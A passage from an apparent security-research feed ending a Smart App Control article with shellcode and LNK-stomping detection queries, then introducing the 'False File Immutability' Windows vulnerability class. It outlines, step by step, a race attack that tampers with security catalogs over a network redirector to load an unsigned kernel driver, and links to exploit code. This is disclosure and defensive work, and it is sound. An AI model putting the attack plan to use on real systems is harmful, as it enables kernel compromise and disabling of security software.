 process.Ext.api.behaviors : (&quot;shellcode&quot;, &quot;allocate_shellcode&quot;, &quot;execute_shellcode&quot;, &quot;unbacked_rwx&quot;, &quot;rwx&quot;, &quot;hook_api&quot;) and
 process.thread.Ext.call_stack_final_user_module.hash.sha256 : &quot;?*&quot;] by process.thread.Ext.call_stack_final_user_module.hash.sha256
</code></pre>
<pre><code>api where process.Ext.api.name : (&quot;VirtualProtect*&quot;, &quot;WriteProcessMemory&quot;, &quot;VirtualAlloc*&quot;, &quot;MapViewOfFile*&quot;) and
 process.Ext.api.behaviors : (&quot;shellcode&quot;, &quot;allocate_shellcode&quot;, &quot;execute_shellcode&quot;, &quot;unbacked_rwx&quot;, &quot;rwx&quot;, &quot;hook_api&quot;) and
 process.thread.Ext.call_stack_final_user_module.name : &quot;ffi_bindings.node&quot;
</code></pre>
<p>Security teams should pay particular attention to downloaded files. They can use local reputation to identify outliers in their environment for closer inspection.</p>
<pre><code>from logs-* | 
where host.os.type == &quot;windows&quot;
and event.category == &quot;process&quot; and event.action == &quot;start&quot;
and process.parent.name == &quot;explorer.exe&quot;
and (process.executable like &quot;*Downloads*&quot; or process.executable like &quot;*Temp*&quot;)
and process.hash.sha256 is not null
| eval process.name = replace(process.name, &quot; \\(1\\).&quot;, &quot;.&quot;)
| stats hosts = count_distinct(agent.id) by process.name, process.hash.sha256
| where hosts == 1
</code></pre>
<p>LNK stomping may have many variants, making signature-based detection on LNK files difficult. However, they should all trigger a similar behavioral signal: <code>explorer.exe</code> overwriting an LNK file. This is especially anomalous in the downloads folder or when the LNK has the Mark of the Web.</p>
<pre><code>file where event.action == &quot;overwrite&quot; and file.extension : &quot;lnk&quot; and
 process.name : &quot;explorer.exe&quot; and process.thread.Ext.call_stack_summary : &quot;ntdll.dll|*|windows.storage.dll|shell32.dll|*&quot; and
 (
  file.path : (&quot;?:\\Users\\*\\Downloads\\*.lnk&quot;, &quot;?:\\Users\\*\\AppData\\Local\\Temp\\*.lnk&quot;) or
  file.Ext.windows.zone_identifier == 3
  )
</code></pre>
<p>Finally, robust behavioral coverage around common attacker techniques such as in-memory evasion, persistence, credential access, enumeration, and lateral movement helps detect realistic intrusions, including from reputation hijacking.</p>
<h2>Conclusion</h2>
<p>Reputation-based protection systems are a powerful layer for blocking commodity malware. However, like any protection technique, they have weaknesses that can be bypassed with some care. Smart App Control and SmartScreen have a number of fundamental design weaknesses that can allow for initial access with no security warnings and minimal user interaction. Security teams should scrutinize downloads carefully in their detection stack and not rely solely on OS-native security features for protection in this area.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/Security Labs Images 19.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Introducing a New Vulnerability Class: False File Immutability]]></title>
            <link>https://www.elastic.co/kr/security-labs/false-file-immutability</link>
            <guid>false-file-immutability</guid>
            <pubDate>Thu, 11 Jul 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article introduces a previously-unnamed class of Windows vulnerability that demonstrates the dangers of assumption and describes some unintended security consequences.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>This article will discuss a previously-unnamed vulnerability class in Windows, showing how long-standing incorrect assumptions in the design of core Windows features can result in both undefined behavior and security vulnerabilities. We will demonstrate how one such vulnerability in the Windows 11 kernel can be exploited to achieve arbitrary code execution with kernel privileges.</p>
<h2>Windows file sharing</h2>
<p>When an application opens a file on Windows, it typically uses some form of the Win32 <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew"><strong>CreateFile</strong></a> API.</p>
<pre><code class="language-c++">HANDLE CreateFileW(
  [in]           LPCWSTR               lpFileName,
  [in]           DWORD                 dwDesiredAccess,
  [in]           DWORD                 dwShareMode,
  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [in]           DWORD                 dwCreationDisposition,
  [in]           DWORD                 dwFlagsAndAttributes,
  [in, optional] HANDLE                hTemplateFile
);
</code></pre>
<p>Callers of <strong>CreateFile</strong> specify the access they want in <strong>dwDesiredAccess</strong>. For example, a caller would pass <strong>FILE_READ_DATA</strong> to be able to read data, or <strong>FILE_WRITE_DATA</strong> to be able to write data. The full set of access rights are <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants">documented</a> on the Microsoft Learn website.</p>
<p>In addition to passing <strong>dwDesiredAccess</strong>, callers must pass a “sharing mode” in <strong>dwShareMode</strong>, which consists of zero or more of <strong>FILE_SHARE_READ</strong>, <strong>FILE_SHARE_WRITE</strong>, and <strong>FILE_SHARE_DELETE</strong>. You can think of a sharing mode as the caller declaring “I’m okay with others doing X to this file while I’m using it,” where X could be reading, writing, or renaming. For example, a caller that passes <strong>FILE_SHARE_WRITE</strong> allows others to write the file while they are working with it.</p>
<p>As a file is opened, the caller’s <strong>dwDesiredAccess</strong> is tested against the <strong>dwShareMode</strong> of all existing file handles. Simultaneously, the caller’s <strong>dwShareMode</strong> is tested against the previously-granted <strong>dwDesiredAccess</strong> of all existing handles to that file. If either of these tests fail, then <strong>CreateFile</strong> fails with a sharing violation.</p>
<p>Sharing isn’t mandatory. Callers can pass a share mode of zero to obtain exclusive access. Per Microsoft <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/creating-and-opening-files">documentation</a>:</p>
<blockquote>
<p>An open file that is not shared (dwShareMode set to zero) cannot be opened again, either by the application that opened it or by another application, until its handle has been closed. This is also referred to as exclusive access.</p>
</blockquote>
<h3>Sharing enforcement</h3>
<p>In the kernel, sharing is enforced by filesystem drivers. As a file is opened, it’s the responsibility of the filesystem driver to call <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocheckshareaccess"><strong>IoCheckShareAccess</strong></a> or <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iochecklinkshareaccess"><strong>IoCheckLinkShareAccess</strong></a> to see whether the requested <strong>DesiredAccess</strong>/<strong>ShareMode</strong> tuple is compatible with any existing handles to the file being opened. <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> is the primary filesystem on Windows, but it’s closed-source, so for illustrative purposes we’ll instead look at Microsoft’s FastFAT sample code performing <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L6822-L6884">the same check</a>. Unlike an IDA decompilation, it even comes with comments!</p>
<pre><code class="language-c++">//
//  Check if the Fcb has the proper share access.
//

return IoCheckShareAccess( *DesiredAccess,
                           ShareAccess,
                           FileObject,
                           &amp;FcbOrDcb-&gt;ShareAccess,
                           FALSE );
</code></pre>
<p>In addition to traditional read/write file operations, Windows lets applications map files into memory. Before we go deeper, it’s important to understand that <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views">section objects</a> are kernel parlance for <a href="https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping">file mappings</a>; they are the same thing. This article focuses on the kernel, so it will primarily refer to them as section objects.</p>
<p>There are two types of section objects - data sections and executable image sections. Data sections are direct 1:1 mappings of files into memory. The file’s contents will appear in memory exactly as they do on disk. Data sections also have uniform memory permissions for the entire memory range. With respect to the underlying file, data sections can be either read-only or read-write. A read-write view of a file enables a process to read or write the file’s contents by reading/writing memory within its own address space.</p>
<p>Executable image sections (sometimes abbreviated to image sections) prepare <a href="https://learn.microsoft.com/en-us/windows/win32/debug/pe-format">PE files</a> to be executed. Image sections must be created from PE files. Examples of PE files include EXE, DLL, SYS, CPL, SCR, and OCX files. The kernel processes the PEs specially to prepare them to be executed. Different PE regions will be mapped in memory with different page permissions, depending on their metadata. Image views are <a href="https://en.wikipedia.org/wiki/Copy-on-write">copy-on-write</a>, meaning any changes in memory will be saved to the process’s private working set — never written to the backing PE.</p>
<p>Let’s say application A wants to map a file into memory with a data section. First, it opens that file with an API such as <strong>ZwCreateFile</strong>, which returns a file handle. Next, it passes this file handle to an API such as <strong>ZwCreateSection</strong> which creates a section object that describes how the file will be mapped into memory; this yields a section handle. The process then uses the section handle to map a “view” of that section into the process address space, completing the memory mapping.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image9.png" alt="Diagram showing how a file is mapped into memory" /></p>
<p>Once the file is successfully mapped, process A can close both the file and section handles, leaving zero open handles to the file. If process B later wants to use the file without the risk of it being modified externally, it would omit <strong>FILE_SHARE_WRITE</strong> when opening the file. <strong>IoCheckShareAccess</strong> looks for open file handles, but since the handles were previously closed, it will not fail the operation.</p>
<p>This creates a problem for file sharing. Process B thinks it has a file open without risk of external modification, but process A can modify it through the memory mapping. To account for this, the filesystem must also call <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences"><strong>MmDoesFileHaveUserWritableReferences</strong></a>. This checks whether there are any active writable file mappings to the given file. We can see this check in the FastFAT example <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L6858-L6870">here</a>:</p>
<pre><code class="language-c++">//
//  Do an extra test for writeable user sections if the user did not allow
//  write sharing - this is neccessary since a section may exist with no handles
//  open to the file its based against.
//

if ((NodeType( FcbOrDcb ) == FAT_NTC_FCB) &amp;&amp;
    !FlagOn( ShareAccess, FILE_SHARE_WRITE ) &amp;&amp;
    FlagOn( *DesiredAccess, FILE_EXECUTE | FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | DELETE | MAXIMUM_ALLOWED ) &amp;&amp;
    MmDoesFileHaveUserWritableReferences( &amp;FcbOrDcb-&gt;NonPaged-&gt;SectionObjectPointers )) {

    return STATUS_SHARING_VIOLATION;
}
</code></pre>
<p>Windows requires PE files to be immutable (unmodifiable) while they are running. This prevents EXEs and DLLs from being changed on disk while they are running in memory. Filesystem drivers must use the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmflushimagesection"><strong>MmFlushImageSection</strong></a> function to check whether there are any active image mappings of a PE before allowing <strong>FILE_WRITE_DATA</strong> access. We can see this in the <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593">FastFAT example code</a>, and on <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images">Microsoft Learn</a>.</p>
<pre><code class="language-c++">//
//  If the user wants write access access to the file make sure there
//  is not a process mapping this file as an image. Any attempt to
//  delete the file will be stopped in fileinfo.c
//
//  If the user wants to delete on close, we must check at this
//  point though.
//

if (FlagOn(*DesiredAccess, FILE_WRITE_DATA) || DeleteOnClose) {

    Fcb-&gt;OpenCount += 1;
    DecrementFcbOpenCount = TRUE;

    if (!MmFlushImageSection( &amp;Fcb-&gt;NonPaged-&gt;SectionObjectPointers,
                              MmFlushForWrite )) {

        Iosb.Status = DeleteOnClose ? STATUS_CANNOT_DELETE :
                                      STATUS_SHARING_VIOLATION;
        try_return( Iosb );
    }
}
</code></pre>
<p>Another way to think of this check is that <strong>ZwMapViewOfSection(SEC_IMAGE)</strong> implies no-write-sharing as long as the view exists.</p>
<h2>Authenticode</h2>
<p>The <a href="https://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/authenticode_pe.docx">Windows Authenticode Specification</a> describes a way to employ cryptography to “sign” PE files. A “digital signature” cryptographically attests that the PE was produced by a particular entity. Digital signatures are tamper-evident, meaning that any material modification of signed files should be detectable because the digital signature will no longer match. Digital signatures are typically appended to the end of PE files.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image19.png" alt="Authenticode specification diagram showing a signature embedded within a PE" /></p>
<p>Authenticode can’t apply traditional hashing (e.g. <strong>sha256sum</strong>) in this case, because the act of appending the signature would change the file’s hash, breaking the signature it just generated. Instead, the Authenticode specification describes an algorithm to skip specific portions of the PE file that will be changed during the signing process. This algorithm is called <strong>authentihash</strong>. You can use authentihash with any hashing algorithm, such as SHA256. When a PE file is digitally signed, the file’s authentihash is what’s actually signed.</p>
<h3>Code integrity</h3>
<p>Windows has a few different ways to validate Authenticode signatures. User mode applications can call <a href="https://learn.microsoft.com/en-us/windows/win32/api/wintrust/nf-wintrust-winverifytrust"><strong>WinVerifyTrust</strong></a> to validate a file’s signature in user mode. The Code Integrity (CI) subsystem, residing in <code>ci.dll</code>,  validates signatures in the kernel. If <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">Hypervisor-Protected Code Integrity</a> is running, the Secure Kernel employs <code>skci.dll</code> to validate Authenticode. This article will focus on Code Integrity (<code>ci.dll</code>) in the regular kernel.</p>
<p>Code Integrity provides both Kernel Mode Code Integrity and User Mode Code Integrity, each serving a different set of functions.</p>
<p>Kernel Mode Code Integrity (KMCI):</p>
<ul>
<li>Enforces <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/driver-signing">Driver Signing Enforcement</a> and the <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist">Vulnerable Driver Blocklist</a></li>
</ul>
<p>User Mode Code Integrity (UMCI):</p>
<ul>
<li>CI validates the signatures of EXEs and DLLs before allowing them to load</li>
<li>Enforces <a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#protected-processes">Protected Processes and Protected Process Light</a> signature requirements</li>
<li>Enforces <strong>ProcessSignaturePolicy</strong> mitigation (<a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setprocessmitigationpolicy"><strong>SetProcessMitigationPolicy</strong></a>)</li>
<li>Enforces <a href="https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170">INTEGRITYCHECK</a> for <a href="https://x.com/GabrielLandau/status/1668353640833114131">FIPS 140-2 modules</a>.</li>
<li>Exposed to consumers as <a href="https://learn.microsoft.com/en-us/windows/apps/develop/smart-app-control/overview">Smart App Control</a></li>
<li>Exposed to businesses as <a href="https://learn.microsoft.com/en-us/mem/intune/protect/endpoint-security-app-control-policy">App Control for Business</a> (formerly WDAC)</li>
</ul>
<p>KMCI and UMCI implement different policies for different scenarios. For example, the policy for Protected Processes is different from that of INTEGRITYCHECK.</p>
<h2>Incorrect assumptions</h2>
<p>Microsoft <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea">documentation</a> implies that files successfully opened without write sharing can’t be modified by another user or process.</p>
<pre><code>FILE_SHARE_WRITE
0x00000002
Enables subsequent open operations on a file or device to request write access. Otherwise, other processes cannot open the file or device if they request write access.

If this flag is not specified, but the file or device has been opened for write access or has a file mapping with write access, the function fails.
</code></pre>
<p><em>Above, we discussed how sharing is enforced by the filesystem, but what if the filesystem doesn’t know that the file’s been modified?</em></p>
<p>Like most user mode memory, the Memory Manager (MM) in the kernel may page-out portions of file mappings when it deems necessary, such as when the system needs more free physical memory. Both data and executable image mappings may be paged-out. Executable image sections can never modify the backing file, so they’re effectively treated as read-only with respect to the backing PE file. As mentioned before, image sections are copy-on-write, meaning any in-memory changes immediately create a private copy of the given page.</p>
<p>When the memory manager needs to page-out a page from an image section, it can use the following decision tree:</p>
<ul>
<li>Never modified?  Discard it. We can read the contents back from the immutable file on disk.</li>
<li>Modified?  Save a private copy to the pagefile.
<ul>
<li>Example: If a security product hooks a function in <code>ntdll.dll</code>, MM will create a private copy of each modified page. Upon page-out, private pages will be written to the pagefile.</li>
</ul>
</li>
</ul>
<p>If those paged-out pages are later touched, the CPU will issue a page fault and the MM will restore the pages.</p>
<ul>
<li>Page never modified?  Read the original contents back from the immutable file on disk.</li>
<li>Page private?  Read it from the pagefile.</li>
</ul>
<p>Note the following exception: The memory manager may treat PE-relocated pages as unmodified, dynamically reapplying relocations during page faults.</p>
<h3>Page hashes</h3>
<p>Page hashes are a list of hashes of each 4KB page within a PE file. Since pages are 4KB, page faults typically occur on 4KB of data at a time. Full Authenticode verification requires the entire contiguous PE file, which isn’t available during a page fault. Page hashes allow the MM to validate hashes of individual pages during page faults.</p>
<p>There are two types of page hashes, which we’ve coined static and dynamic. Static page hashes are stored within a PE’s digital signature if the developer passes <code>/ph</code> to <a href="https://learn.microsoft.com/en-us/windows/win32/seccrypto/signtool"><code>signtool</code></a>. Because they are pre-computed, they are immediately available to the MM and CI upon module load.</p>
<p>CI can also compute them on-the-fly during signature validation, a mechanism we’re calling dynamic page hashes. Dynamic page hashes give CI flexibility to enforce page hashes even for files that were never signed with them.</p>
<p>Page hashes are not free - they use CPU and slow down page faults. They’re not used in most cases.</p>
<h2>Attacking code integrity</h2>
<p>Imagine a scenario where a ransomware operator wants to ransom a hospital, so they send a phishing email to a hospital employee. The employee opens the email attachment and enables macros, running the ransomware. The ransomware employs a UAC bypass to immediately elevate to admin, then attempts to terminate any security software on the system so it can operate unhindered. Anti-Malware services run as <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">Protected Process Light</a> (PPL), protecting them from tampering by malware with admin rights, so the ransomware can’t terminate the Anti-Malware service.</p>
<p>If the ransomware could also run as a PPL, it could terminate the Anti-Malware product. The ransomware can’t launch itself directly as a PPL because UMCI prevents improperly-signed EXEs and DLLs from loading into PPL, as we discussed above. The ransomware might try to inject code into a PPL by modifying an EXE or DLL that’s already running, but the aforementioned <strong>MmFlushImageSection</strong> ensures in-use PE files remain immutable, so this isn’t possible.</p>
<p>We previously discussed how the filesystem is responsible for sharing checks. <em>What would happen if an attacker were to move the filesystem to another machine?</em></p>
<p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-">Network redirectors</a> allow the use of network paths with any API that accepts file paths. This is very convenient, allowing users and applications to easily open and memory-map files over the network. Any resulting I/O is transparently redirected to the remote machine. If a program is launched from a network drive, the executable images for the EXE and its DLLs will be transparently pulled from the network.</p>
<p>When a network redirector is in use, the server on the other end of the pipe needn’t be a Windows machine. It could be a Linux machine running <a href="https://en.wikipedia.org/wiki/Samba_(software)">Samba</a>, or even a python <a href="https://github.com/fortra/impacket/blob/d71f4662eaf12c006c2ea7f5ec09b418d9495806/examples/smbserver.py">impacket script</a> that “speaks” the <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB network protocol</a>. This means the server doesn’t have to honor Windows filesystem sharing semantics.</p>
<p>An attacker can employ a network redirector to modify a PPL’s DLL server-side, bypassing sharing restrictions. This means that PEs backing an executable image section are incorrectly assumed to be immutable. This is a class of vulnerability that we are calling <strong>False File Immutability</strong> (FFI).</p>
<h3>Paging exploitation</h3>
<p>If an attacker successfully exploits False File Immutability to inject code into an in-use PE, wouldn’t page hashes catch such an attack?  The answer is: sometimes. If we look at the following table, we can see that page hashes are enforced for kernel drivers and Protected Processes, but not for PPL, so let’s pretend we’re an attacker targeting PPL.</p>
<table>
<thead>
<tr>
<th></th>
<th>Authenticode</th>
<th>Page hashes</th>
</tr>
</thead>
<tbody>
<tr>
<td>Kernel drivers</td>
<td>✅</td>
<td>✅</td>
</tr>
<tr>
<td>Protected Processes (PP-Full)</td>
<td>✅</td>
<td>✅</td>
</tr>
<tr>
<td>Protected Process Light (PPL)</td>
<td>✅</td>
<td>❌</td>
</tr>
</tbody>
</table>
<p>Last year at Black Hat Asia 2023 (<a href="https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052">abstract</a>, <a href="http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf">slides</a>, <a href="https://www.youtube.com/watch?v=5xteW8Tm410">recording</a>), we disclosed a vulnerability in the Windows kernel, showing how bad assumptions in paging can be exploited to inject code into PPL, defeating security features like <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection">LSA</a> &amp; <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">Anti-Malware Process Protection</a>. The attack leveraged False File Immutability assumptions for DLLs in PPLs, as we just described, though we hadn’t yet named the vulnerability class.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image5.png" alt="A diagram of the PPLFault exploit" /></p>
<p>Alongside the presentation, we released the <a href="https://github.com/gabriellandau/PPLFault">PPLFault exploit</a> which demonstrates the vulnerability by dumping the memory of an otherwise-protected PPL. We also released the GodFault exploit chain, which combines the PPLFault Admin-to-PPL exploit with the AngryOrchard PPL-to-kernel exploit to achieve full read/write control of physical memory from user mode. We did this to motivate Microsoft to take action on a vulnerability that MSRC <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">declined to fix</a> because it did not meet their <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">servicing criteria</a>. Thankfully, the Windows Defender team at Microsoft stepped up, <a href="https://x.com/GabrielLandau/status/1757818200127946922">releasing a fix</a> in February 2024 that enforces dynamic page hashes for executable images loaded over network redirectors, breaking PPLFault.</p>
<h2>New research</h2>
<p>Above, we discussed Authenticode signatures embedded within PE files. In addition to embedded signatures, Windows supports a form of detached signature called a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/catalog-files">security catalog</a>. Security catalogs (.cat files) are essentially a list of signed authentihashes. Every PE with an authentihash in that list is considered to be signed by that signer. Windows keeps a large collection of catalog files in <code>C:\Windows\System32\CatRoot</code> which CI loads, validates, and caches.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image7.png" alt="Simplified structure of a security catalog" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image21.png" alt="A security catalog rendered through Windows Explorer" /></p>
<p>A typical Windows system has over a thousand catalog files, many containing dozens or hundreds of authentihashes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image16.png" alt="Security catalogs on a Windows 11 23H2 system" /></p>
<p>To use a security catalog, Code Integrity must first load it. This occurs in a few discrete steps. First, CI maps the file into kernel memory using <strong>ZwOpenFile</strong>, <strong>ZwCreateSection</strong>, and <strong>ZwMapViewOfSection</strong>. Once mapped, it validates the catalog’s digital signature using <strong>CI!MinCrypK_VerifySignedDataKModeEx</strong>. If the signature is valid, it parses the hashes with <strong>CI!I_MapFileHashes</strong>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image10.png" alt="The Code Integrity catalog parsing process" /></p>
<p>Breaking this down, we see a few key insights. First, <strong>ZwCreateSection(SEC_COMMIT)</strong> tells us that CI is creating a data section, not an image section. This is important because there is no concept of page hashes for data sections.</p>
<p>Next, the file is opened without <strong>FILE_SHARE_WRITE</strong>, meaning write sharing is denied. This is intended to prevent modification of the security catalog during processing. However, as we have shown above, this is a bad assumption and another example of False File Immutability. It should be possible, in theory, to perform a PPLFault-style attack on security catalog processing.</p>
<h3>Planning the attack</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image11.png" alt="" /></p>
<p>The general flow of the attack is as follows:</p>
<ol>
<li>The attacker will plant a security catalog on a storage device that they control. They will install a symbolic link to this catalog in the <code>CatRoot</code> directory, so Windows knows where to find it.</li>
<li>The attacker asks the kernel to load a malicious unsigned kernel driver.</li>
<li>Code Integrity attempts to validate the driver, but it can’t find a signature or trusted authentihash, so it re-scans the CatRoot directory and finds the attacker’s new catalog.</li>
<li>CI maps the catalog into kernel memory and validates its signature. This generates page faults which are sent to the attacker’s storage device. The storage device returns a legitimate Microsoft-signed catalog.</li>
<li>The attacker empties the system working set, forcing all the previously-fetched catalog pages to be discarded.</li>
<li>CI begins parsing the catalog, generating new page faults. This time, the storage device injects the authentihash of their malicious driver.</li>
<li>CI finds the malicious driver’s authentihash in the catalog and loads the driver. At this point, the attacker has achieved arbitrary code execution in the kernel.</li>
</ol>
<h3>Implementation and considerations</h3>
<p>The plan is to use a PPLFault-style attack, but there are some important differences in this situation. PPLFault used an <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/opportunistic-locks">opportunistic lock</a> (oplock) to deterministically freeze the victim process’s initialization. This gave the attacker time to switch over to the payload and flush the system working set. Unfortunately, we couldn’t find any good opportunities for oplocks here. Instead, we’re going to pursue a probabilistic approach: rapidly toggling the security catalog between the malicious and benign versions.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image12.png" alt="The catalog being toggled between benign and malicious versions; only one hash changes" /></p>
<p>The verification step touches every page of the catalog, which means all of those pages will be resident in memory when parsing begins. If the attacker changes the catalog on their storage device, it won’t be reflected in memory until after a subsequent page fault. To evict these pages from kernel memory, the attacker must empty the working set between <strong>MinCrypK_VerifySignedDataKModeEx</strong> and <strong>I_MapFileHashes</strong>.</p>
<p>This approach is inherently a race condition. There are no built-in delays between signature verification and catalog parsing - it’s a tight race. We’ll need to employ several techniques to widen our window of opportunity.</p>
<p>Most security catalogs on the system are small, a few kilobytes. By choosing a large 4MB catalog, we can greatly increase the amount of time that CI spends parsing. Assuming catalog parsing is linear, we can choose an authentihash near the end of the catalog to maximize the time between signature verification and when CI reaches our tampered page. Further, we will create threads for each CPU on the system whose sole purpose is to consume CPU cycles. These threads run at higher priority than CI, so CI will be starved of CPU time. There will be one thread dedicated to repeatedly flushing pages from the system’s working set, and one thread repeatedly attempting to load the unsigned driver.</p>
<p>This attack has two main failure modes. First, if the payload authentihash is read during the signature check, the signature will be invalid and the catalog will be rejected.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image17.png" alt="Code Integrity rejecting a tampered security catalog" /></p>
<p>Next, if an even number of toggles occur (including zero) between signature validation and parsing, then CI will parse the benign hash and reject our driver.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image6.png" alt="Passing the signature check, but the benign catalog is parsed" /></p>
<p>The attacker wins if CI validates a benign catalog then parses a malicious one.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image20.png" alt="Code Integrity validating a benign catalog, then parsing a malicious one" /></p>
<h3>Exploit demo</h3>
<p>We named the exploit <strong>ItsNotASecurityBoundary</strong> as an homage to MSRC's <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">policy</a> that &quot;Administrator-to-kernel is not a security boundary.&quot; The code is on GitHub <a href="https://github.com/gabriellandau/ItsNotASecurityBoundary">here</a>.</p>
<p>Demo video <a href="https://drive.google.com/file/d/13Uw38ZrNeYwfoIuD76qlLgyXP8kRc8Nz/view?usp=sharing">here</a>.</p>
<h2>Understanding these vulnerabilities</h2>
<p>In order to properly defend against these vulnerabilities, we first need to understand them better.</p>
<p>A double-read (aka double-fetch) vulnerability can occur when victim code reads the same value out of an attacker-controlled buffer more than once. The attacker may change the value of this buffer between the reads, resulting in unexpected victim behavior.</p>
<p>Imagine there is a page of memory shared between two processes for an IPC mechanism. The client and server send data back and forth using the following struct. To send an IPC request, a client first writes a request struct into the shared memory page, then signals an event to notify the server of a pending request.</p>
<pre><code class="language-c">struct IPC_PACKET
{
    SIZE_T length;
    UCHAR data[];
};
</code></pre>
<p>A double-read attack could look something like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image18.png" alt="An example of a double-read exploit using shared memory" /></p>
<p>First, the attacking client sets the packet structure’s length field to 16 bytes, then signals the server to indicate that a packet is ready for processing.  The victim server wakes up and allocates a 16-byte buffer using <code>malloc(pPacket-&gt;length)</code>.  Immediately afterwards, the attacker changes the length field to 32.  Next, the victim server attempts to copy the packet’s contents into the new buffer by calling <code>memcpy(pBuffer, pPacket-&gt;data, pPacket-&gt;length)</code>, re-reading the value in <code>pPacket-&gt;length</code>, which is now 32.  The victim ends up copying 32 bytes into a 16-byte buffer, overflowing it.</p>
<p>Double-read vulnerabilities frequently apply to shared-memory scenarios. They commonly occur in drivers that operate on user-writable buffers. Due to False File Immutability, developers need to be aware that the scope of double reads is actually much wider, and includes all files writable by attackers. Denying write sharing does not necessarily prevent file modification.</p>
<h3>Affected Operations</h3>
<p>What types of operations are affected by False File Immutability?</p>
<table>
<thead>
<tr>
<th>Operation</th>
<th>API</th>
<th>Mitigations</th>
</tr>
</thead>
<tbody>
<tr>
<td>Image Sections</td>
<td><strong>CreateProcess</strong> <strong>LoadLibrary</strong></td>
<td>1. Enable Page Hashes</td>
</tr>
<tr>
<td>Data Sections</td>
<td><strong>MapViewOfFile</strong> <strong>ZwMapViewOfSection</strong></td>
<td>1. Avoid double reads<br />2. Copy the file to a heap buffer before processing<br />3. Prevent paging via MmProbeAndLockPages/VirtualLock</td>
</tr>
<tr>
<td>Regular I/O</td>
<td><strong>ReadFile</strong> <strong>ZwReadFile</strong></td>
<td>1. Avoid double reads<br />2. Copy the file to a heap buffer before processing</td>
</tr>
</tbody>
</table>
<h3>What else could be vulnerable?</h3>
<p>Looking for potentially-vulnerable calls to <strong>ZwMapViewOfSection</strong> in the NT kernel yields quite a few interesting functions:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image8.png" alt="Potentially-vulnerable uses of ZwMapViewOfSection within the NT kernel" /></p>
<p>If we expand our search to regular file I/O, we find even more candidates. An important caveat, however, is that <strong>ZwReadFile</strong> may be used for more than just files. Only uses on files (or those which could be coerced into operating on files) could be vulnerable.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image14.png" alt="Potentially-vulnerable uses of ZwReadFile within the NT kernel" /></p>
<p>Looking outside of the NT kernel, we can find other drivers to investigate:</p>
